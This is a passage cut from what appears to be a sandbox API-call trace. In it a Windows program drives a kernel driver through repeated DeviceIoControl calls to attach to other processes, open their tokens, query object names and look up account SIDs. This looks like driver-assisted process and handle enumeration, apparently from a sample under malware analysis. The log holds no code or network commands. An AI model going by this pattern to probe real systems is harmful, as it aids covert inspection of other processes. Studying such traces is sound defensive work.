IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.177] CloseHandle (hObject=0xc4) returned 1 [0246.177] CloseHandle (hObject=0xc8) returned 1 [0246.177] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.177] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.177] PsLookupProcessByProcessId (in: ProcessId=0x8d4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.177] PsAcquireProcessExitSynchronization () returned 0x0 [0246.177] KeStackAttachProcess (in: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880053c85d0) [0246.177] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fdc070, HandleInformation=0x0) returned 0x0 [0246.177] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.177] PsReleaseProcessExitSynchronization () returned 0x2 [0246.177] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x12 [0246.177] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.177] ObfDereferenceObject (Object=0xfffffa8001fdc070) returned 0x1 [0246.177] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.178] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.178] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.178] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0246.178] PsLookupProcessByProcessId (in: ProcessId=0x8d4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.178] PsAcquireProcessExitSynchronization () returned 0x0 [0246.178] KeStackAttachProcess (in: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880053c85d0) [0246.178] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fe2dd0, HandleInformation=0x0) returned 0x0 [0246.178] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.178] PsReleaseProcessExitSynchronization () returned 0x2 [0246.178] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x12 [0246.178] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.178] ObfDereferenceObject (Object=0xfffffa8001fe2dd0) returned 0x1 [0246.178] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.178] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.178] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.178] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.178] PsLookupProcessByProcessId (in: ProcessId=0x8d4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.178] PsAcquireProcessExitSynchronization () returned 0x0 [0246.178] KeStackAttachProcess (in: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880053c85d0) [0246.178] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.179] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.179] PsReleaseProcessExitSynchronization () returned 0x2 [0246.179] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x12 [0246.179] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.179] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.179] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.179] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e4) returned 0xc8 [0246.179] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.179] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800208ab30, HandleInformation=0x0) returned 0x0 [0246.179] ObOpenObjectByPointer (in: Object=0xfffffa800208ab30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.179] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x14 [0246.179] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.179] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.180] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.180] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.180] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.182] CloseHandle (hObject=0xc4) returned 1 [0246.182] CloseHandle (hObject=0xc8) returned 1 [0246.182] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.182] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.182] PsLookupProcessByProcessId (in: ProcessId=0x8e4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.183] PsAcquireProcessExitSynchronization () returned 0x0 [0246.183] KeStackAttachProcess (in: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880053c85d0) [0246.183] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fe2f20, HandleInformation=0x0) returned 0x0 [0246.183] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.183] PsReleaseProcessExitSynchronization () returned 0x2 [0246.183] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x12 [0246.183] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.183] ObfDereferenceObject (Object=0xfffffa8001fe2f20) returned 0x1 [0246.183] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.183] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.183] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.183] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6c, lpOverlapped=0x0) returned 1 [0246.183] PsLookupProcessByProcessId (in: ProcessId=0x8e4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.183] PsAcquireProcessExitSynchronization () returned 0x0 [0246.183] KeStackAttachProcess (in: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880053c85d0) [0246.183] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800202cbd0, HandleInformation=0x0) returned 0x0 [0246.183] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.183] PsReleaseProcessExitSynchronization () returned 0x2 [0246.183] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x12 [0246.184] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.184] ObfDereferenceObject (Object=0xfffffa800202cbd0) returned 0x1 [0246.184] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.184] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.184] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.184] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.184] PsLookupProcessByProcessId (in: ProcessId=0x8e4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.184] PsAcquireProcessExitSynchronization () returned 0x0 [0246.184] KeStackAttachProcess (in: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800208ab30, ApcState=0xfffff880053c85d0) [0246.184] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.184] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.184] PsReleaseProcessExitSynchronization () returned 0x2 [0246.184] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x12 [0246.184] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.184] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.184] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.184] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8f4) returned 0xc8 [0246.184] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.185] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020a3b30, HandleInformation=0x0) returned 0x0 [0246.185] ObOpenObjectByPointer (in: Object=0xfffffa80020a3b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.185] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x14 [0246.185] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.185] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.185] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.185] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.185] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.187] CloseHandle (hObject=0xc4) returned 1 [0246.187] CloseHandle (hObject=0xc8) returned 1 [0246.187] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.187] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.187] PsLookupProcessByProcessId (in: ProcessId=0x8f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.187] PsAcquireProcessExitSynchronization () returned 0x0 [0246.187] KeStackAttachProcess (in: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880053c85d0) [0246.187] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002065f20, HandleInformation=0x0) returned 0x0 [0246.187] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.187] PsReleaseProcessExitSynchronization () returned 0x2 [0246.187] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x12 [0246.187] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.187] ObfDereferenceObject (Object=0xfffffa8002065f20) returned 0x1 [0246.187] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.188] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.188] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.188] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0246.188] PsLookupProcessByProcessId (in: ProcessId=0x8f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.188] PsAcquireProcessExitSynchronization () returned 0x0 [0246.188] KeStackAttachProcess (in: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880053c85d0) [0246.188] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002052750, HandleInformation=0x0) returned 0x0 [0246.188] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.188] PsReleaseProcessExitSynchronization () returned 0x2 [0246.188] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x12 [0246.188] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.188] ObfDereferenceObject (Object=0xfffffa8002052750) returned 0x1 [0246.188] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.188] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.188] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.188] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.188] PsLookupProcessByProcessId (in: ProcessId=0x8f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.188] PsAcquireProcessExitSynchronization () returned 0x0 [0246.188] KeStackAttachProcess (in: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a3b30, ApcState=0xfffff880053c85d0) [0246.188] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.188] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.188] PsReleaseProcessExitSynchronization () returned 0x2 [0246.188] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x12 [0246.189] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.189] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.189] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.189] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x904) returned 0xc8 [0246.189] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.189] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020a5b30, HandleInformation=0x0) returned 0x0 [0246.189] ObOpenObjectByPointer (in: Object=0xfffffa80020a5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.189] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x14 [0246.189] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.189] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.189] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.189] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.189] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.268] CloseHandle (hObject=0xc4) returned 1 [0246.268] CloseHandle (hObject=0xc8) returned 1 [0246.268] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.268] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.268] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.268] PsAcquireProcessExitSynchronization () returned 0x0 [0246.268] KeStackAttachProcess (in: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880053c85d0) [0246.268] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001eaa510, HandleInformation=0x0) returned 0x0 [0246.268] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.268] PsReleaseProcessExitSynchronization () returned 0x2 [0246.268] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x12 [0246.268] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.268] ObfDereferenceObject (Object=0xfffffa8001eaa510) returned 0x1 [0246.268] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.269] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.269] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.269] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0246.269] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.269] PsAcquireProcessExitSynchronization () returned 0x0 [0246.269] KeStackAttachProcess (in: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a5b30, ApcState=0xfffff880053c85d0) [0246.269] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020ad670, HandleInformation=0x0) returned 0x0 [0246.269] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.269] PsReleaseProcessExitSynchronization () returned 0x2 [0246.269] ObfDereferenceObject (Object=0xfffffa80020a5b30) returned 0x12 [0246.269] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.269] ObfDereferenceObject (Object=0xfffffa80020ad670) returned 0x1 [0246.269] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.269] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.269] RtlAllocateHeap 